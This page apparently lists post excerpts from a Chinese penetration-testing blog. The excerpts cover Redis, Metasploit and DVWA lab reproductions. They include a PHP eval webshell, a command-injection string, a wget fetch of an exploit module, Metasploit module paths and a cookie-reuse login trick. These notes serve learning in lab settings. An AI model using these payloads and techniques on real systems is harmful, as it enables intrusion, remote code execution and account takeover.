![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透
TzerQ
要么庸俗,要么孤独!
展开
-
Redis系列漏洞总结
Redis系列漏洞总结文章目录Redis系列漏洞总结环境:ubuntu16.04,redis5.0.1redis下载及安装redis 漏洞利用方式0x01 绝对路径写shell0x02 redis 写入ssh公钥0x03 Redis主从复制getshellredis 主从结合ssrf0x04redis利用crontab定时任务反弹getshell(此方式只针对centos服务器)环境:ubuntu16.04,redis5.0.1redis下载及安装下载wget http://download.原创 2020-10-06 21:15:11 · 5867 阅读 · 4 评论 -
msf下的LNK漏洞复现
1.漏洞环境及攻击系统漏洞环境靶机: win7 x64 :192.168.1.102攻击机:kali x64 :192.168.1.104漏洞利用1.kali 主机下载 cve_2017_8464_lnk_rce.rb:wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447...原创 2019-08-02 23:09:23 · 349 阅读 · 0 评论 -
DVWA之命令注入
DVWA之命令注入Low查看源码:ip参数没有做任何的过滤就直接放在shell_exec函数中执行了,执行语句为shell_exec( 'ping 127.0.0.1 && whami ')。(linux下使用whoami查看用户命令,windows使用net user)low级别的代码接收了用户输入的ip,然后根据服务器是否是Windows NT系统,对目标ip进行...转载 2019-04-07 12:59:53 · 1218 阅读 · 1 评论 -
DVWA安装笔记
一、搭建LAMP环境首先搭建好LAMP环境,如没配好参见“Linux+Apache+MySQL+PHP配置教程”或者使用官方推荐的XAMPP:https://www.apachefriends.org/download.html二、安装DVWA2.1 下载DVWA官网:http://www.dvwa.co.uk/直接下载:https://codeload.github.com/e...转载 2019-03-31 18:55:50 · 2075 阅读 · 0 评论 -
DVWA 之文件上传漏洞
Low没有进行任何过滤首相,上传一个phpinfo.php,其内代码如下:<?php phpinfo(); ?>上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php然后访问首先,写好说明存在上传和执行漏洞上传一句话木马:<?php @eval($_POST[“hack”]); ?>...原创 2019-03-31 18:43:36 · 649 阅读 · 0 评论 -
文件上传漏洞整理笔记
文件上传漏洞文件上传校验姿势客户端javascript校验(一般只校验后缀名)一般都在网页上写一段javascript脚本,校验上传文件后缀名,有白名单形式也有黑名单形式。判断方式:在浏览器加载文件,但是未点击上传按钮时弹出对话框,如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包服务段校验content-type字段校验这里以PHP代码为例,模拟w...转载 2019-03-31 18:30:15 · 944 阅读 · 0 评论 -
linux基础笔记
linux基础磁盘分区表示Linux中将硬盘、分区等设备均表示硬盘和分区结构文件系统类型Linux中默认使用文件系统类型EXT4,第3代扩展(Extended)文件系统SWAP,交换文件系统Linux支持的其它文件系统类型FAT16,FAT32,NTFSXFS,JFS…系统常用命令df -T 查看挂载详细信息umount /dev/sr...原创 2019-03-22 00:06:31 · 192 阅读 · 0 评论 -
通过修改Cookie登录后台
如何通过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试!首先我们通过IE浏览器拿到我们登入博客园后的Cookie,通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息,然后我们找到cnblogs.com站点下的Cookie,然后复制下.CNBlogsCookie和key和value值,如图所示!众所周知,cookies属于隐私数据,不...转载 2019-03-17 15:31:26 · 5249 阅读 · 0 评论 -
windous基础笔记
1.系统目录programData 黑客往往会黑这个目录Windous 安装目录,系统文件,其中的system32/config下的SAM文件中存放用户信息system/drivers/etc中的hosts文件中存储本地域名hydra 可以跑telnet用户和密码端口http协议代理服务器常用端口:80/8080/3128/8081/9080ftp(文件传...原创 2019-03-20 02:04:27 · 296 阅读 · 0 评论 -
sql注入基础知识小结
1.注入的分类(1)基于从服务器接收到的响应 基于错误的SQL注入 联合查询的类型 堆查询注射 SQL盲注基于布尔SQL盲注基于时间的SQL盲注基于报错的SQL盲注(2)基于如何处理输入的SQL查询(数据类型)•基于字符串•数字或整数为基础的(3)基于程度和顺序的注入(哪里发生了影响) 一阶注射 二阶注射一阶注射是指输入的注射语句对WEB直接产生了影响,出现了结...转载 2019-02-03 14:22:25 · 315 阅读 · 0 评论 -
MSF之MS12-020蓝屏攻击复现
MSF之MS12-020蓝屏攻击复现准备漏洞利用准备实验准备环境:被攻击机:虚拟机win2008x64位系统,其IP为:10.101.63.66攻击机:kali系统,其IP为:10.101.24.83攻击工具:kali自带的msfconsole工具漏洞利用在kali终端中输入msfconsolemsfconsoleuse auxiliary/dos/windows/rdp/ms...原创 2018-12-04 23:58:09 · 2275 阅读 · 2 评论 -
MSF之IIS6WebDAV执行漏洞复现
MSF之IIS6WebDAV执行漏洞复现准备扫描漏洞准备实验准备环境:靶机:虚拟机win2003 r2位系统,其IP为:10.101.63.150攻击机:kali系统,其IP为:10.101.17.33攻击工具:kali自带的msfconsole工具靶机搭建iis6,可参考:https://jingyan.baidu.com/article/0aa22375bcffb388cc0d6...原创 2018-12-02 12:28:16 · 1585 阅读 · 0 评论 -
MSF之CVE-2017-8464远程命令执行漏洞复现
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞准备实验准备环境:被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107攻击机:虚拟机kali系统,其IP为:192.168.1.111攻击工具:kali自带的msfconsole工具扫描漏洞在kali终端中输入msfconsolecd 下载/msfvenom -p windows...原创 2018-12-02 17:00:17 · 3278 阅读 · 2 评论 -
MSF之ms17-010永恒之蓝漏洞利用
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击准备实验准备环境:被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)攻击机:虚拟机kali系统,其IP为:192.168.207.130攻击工具:kali自带的msfconsole工具扫描漏洞在kali终端中输入msfconsoleuse auxiliary/scanner/smb/s...原创 2018-11-26 13:14:43 · 16420 阅读 · 8 评论